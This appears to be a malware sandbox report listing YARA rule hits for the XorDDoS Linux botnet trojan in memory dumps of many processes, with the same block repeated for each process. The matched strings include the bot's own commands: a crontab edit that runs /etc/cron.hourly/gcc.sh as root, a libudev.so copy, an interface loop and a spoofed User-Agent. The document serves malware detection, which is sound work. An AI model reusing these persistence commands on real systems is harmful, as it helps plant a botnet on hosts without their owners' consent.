10313.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9937.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9937.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9937.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9937.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10060.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10060.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10060.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10060.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9882.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9882.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9882.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9882.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9827.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9827.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9827.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9827.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9893.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9893.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9893.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9893.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10038.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10038.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10038.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10038.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9849.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9849.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9849.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9849.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10203.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10203.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10203.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10203.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9970.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9970.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9970.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9970.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10126.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10126.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10126.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10126.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10357.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10357.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10357.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10357.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9783.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9783.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9783.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9783.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10335.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10335.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10335.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10335.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10049.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10049.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10049.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10049.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9994.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9994.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9994.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9994.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10302.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10302.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10302.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10302.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9673.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9673.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9673.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9673.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10236.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10236.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10236.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10236.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10170.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10170.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10170.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10170.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9717.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9717.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9717.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9717.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9618.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9618.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9618.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9618.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9805.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9805.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9805.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9805.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9574.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
